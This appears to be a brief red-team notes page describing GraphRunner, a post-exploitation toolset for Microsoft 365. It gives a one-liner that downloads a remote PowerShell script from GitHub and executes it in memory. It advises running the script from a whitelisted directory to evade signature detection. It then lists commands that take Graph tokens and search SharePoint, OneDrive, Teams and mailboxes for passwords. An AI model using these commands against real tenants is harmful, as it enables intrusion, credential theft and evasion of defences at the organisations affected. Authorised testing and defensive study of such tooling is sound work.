GraphRunner
An excellent tool for finding loot in Microsoft 365 environments is the GraphRunner
post-exploitation toolset. We can download and import the GraphRunner PowerShell script. It will be heavily signatured so we'll execute it from a whitelisted directory.
IEX (iwr 'https://raw.githubusercontent.com/dafthack/GraphRunner/main/GraphRunner.ps1')
Get a graph session:
Get-GraphTokens
Download SharePoint and OneDrive files that contain "password"
Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm 'password'
Teams is commonly used by organizations and we can use the Invoke-SearchTeams
module that can search all Teams messages in all channels that are readable by the current user, as well as notes/chat that the user sends to themselves.
Invoke-SearchTeams -Tokens $tokens -SearchTerm password
Search email:
Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 40
Last updated